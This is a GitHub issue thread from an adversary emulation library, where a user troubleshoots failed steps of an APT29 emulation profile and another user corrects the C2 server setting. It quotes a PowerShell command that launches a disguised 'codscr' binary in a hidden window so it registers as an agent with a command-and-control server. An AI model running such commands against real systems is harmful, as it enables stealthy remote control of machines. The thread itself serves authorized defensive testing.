center-for-threat-informed-defense / adversary_emulation_library

An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs.
https://ctid.io/adversary-emulation
Apache License 2.0

Error in APT29 profile execution #91

Open psrivast31 opened 3 years ago

psrivast31 commented 3 years ago

Multiple payloads are not available during execution:


. .\stepTwelve.ps1;detectav
. : The term '.\stepTwelve.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:3


. .\stepThirteen.ps1;comp;
. : The term '.\stepThirteen.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.


Sleep 3;$bin = Get-ChildItem codscr*;$arguments = '-server "https://vm01-" -group "rtlo_group"';start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments;if ($?) { write-host "Successfully completed RTLO execution. A new agent should appear"; exit 0;} else { write-host "Failure of RTLO execution."; exit 1;}
You cannot call a method on a null-valued expression.
At line:1 char:151


Thamane commented 3 years ago

Hello, are you sure you are running the latest version of emu? It used to have a payload issue that got partially solved last month. Moreover, the facts that you are using might be wrong. Your payload points to -server "https://vm01-" as a C2 server (the server running Caldera). It usually looks more like -server "192.168.0.4", depending on the IP where your C2 is located.